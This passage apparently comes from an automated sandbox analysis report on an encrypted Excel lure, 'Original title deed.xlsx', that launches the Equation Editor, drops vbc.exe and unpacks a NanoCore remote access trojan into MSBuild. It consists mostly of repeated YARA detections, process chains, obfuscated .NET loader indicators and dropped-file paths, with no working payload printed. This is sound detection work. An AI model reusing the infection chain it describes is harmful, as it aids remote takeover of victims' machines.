        Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
        Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
        Source: classification engine Classification label: mal100.rans.troj.expl.evad.winXLSX@65/72@1/1
        Source: C:\Users\Public\vbc.exe Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403461
        Source: C:\Users\Public\vbc.exe Code function: 4_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_0040473E
        Source: C:\Users\Public\vbc.exe Code function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,4_2_0040216B
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Original title deed.xlsx
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE3AA.tmp
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
        Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
        Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exe Process created: unknown unknown
        Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: Original title deed.xlsx Static file information: File size 1173504 > 1048576
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.2150153409.0000000003270000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.2167801125.0000000002900000.00000004.00000001.sdmp, vbc.exe, 00000008.00000003.2179925246.00000000029C0000.00000004.00000001.sdmp, vbc.exe, 0000000A.00000003.2191624487.0000000002860000.00000004.00000001.sdmp
        Source: Original title deed.xlsx Initial sample: OLE indicators vbamacros = False
        Source: Original title deed.xlsx Initial sample: OLE indicators encrypted = True

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.2.vbc.exe.30a0000.8.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 5.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 6.2.vbc.exe.2830000.7.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 7.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 8.2.vbc.exe.2860000.7.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 9.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 4.2.vbc.exe.30a0000.8.unpack, 5.2.MSBuild.exe.400000.0.unpack, 6.2.vbc.exe.2830000.7.unpack, 7.2.MSBuild.exe.400000.0.unpack, 8.2.vbc.exe.2860000.7.unpack, 9.2.MSBuild.exe.400000.0.unpack: High entropy of concatenated method names
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsxA0F3.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nshF115.tmp\lk95ejdjuy.dll
        Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsx542B.tmp\lk95ejdjuy.dll
